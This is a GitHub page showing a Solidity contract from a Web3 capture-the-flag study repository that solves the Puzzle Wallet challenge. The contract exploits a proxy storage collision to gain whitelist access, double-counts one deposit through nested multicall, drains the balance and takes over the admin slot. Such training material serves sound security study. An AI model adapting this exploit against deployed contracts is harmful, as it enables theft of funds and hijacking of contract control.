forked from DeFiHackLabs/Web3-CTF-Intensive-CoLearning
-
Notifications
You must be signed in to change notification settings - Fork 0
/
PuzzleWallet.sol
46 lines (37 loc) · 1.52 KB
/
PuzzleWallet.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
// SPDX-License-Identifier: MIT
pragma solidity 0.8.0;
interface IPuzzleWallet {
function admin() external view returns (address);
function proposeNewAdmin(address _newAdmin) external;
function approveNewAdmin(address _expectedAdmin) external;
function upgradeTo(address _newImplementation) external;
function setMaxBalance(uint256 _maxBalance) external;
function addToWhitelist(address addr) external;
function deposit() external payable;
function execute(
address to,
uint256 value,
bytes calldata data
) external payable;
function multicall(bytes[] calldata data) external payable;
function whitelisted(address addr) external view returns (bool);
}
contract HackerPuzzleWallet {
constructor(IPuzzleWallet wallet) payable {
bytes[] memory depositSelector = new bytes[](1);
depositSelector[0] = abi.encodeWithSelector(wallet.deposit.selector);
bytes[] memory multiData = new bytes[](2);
multiData[0] = abi.encodeWithSelector(wallet.deposit.selector);
multiData[1] = abi.encodeWithSelector(
wallet.multicall.selector,
depositSelector
);
wallet.proposeNewAdmin(address(this));
wallet.addToWhitelist(address(this));
require(wallet.whitelisted(address(this)));
wallet.multicall{value: 0.001 ether}(multiData);
wallet.execute(msg.sender, 0.002 ether, "");
wallet.setMaxBalance(uint256(uint160(msg.sender)));
require(wallet.admin() == msg.sender);
}
}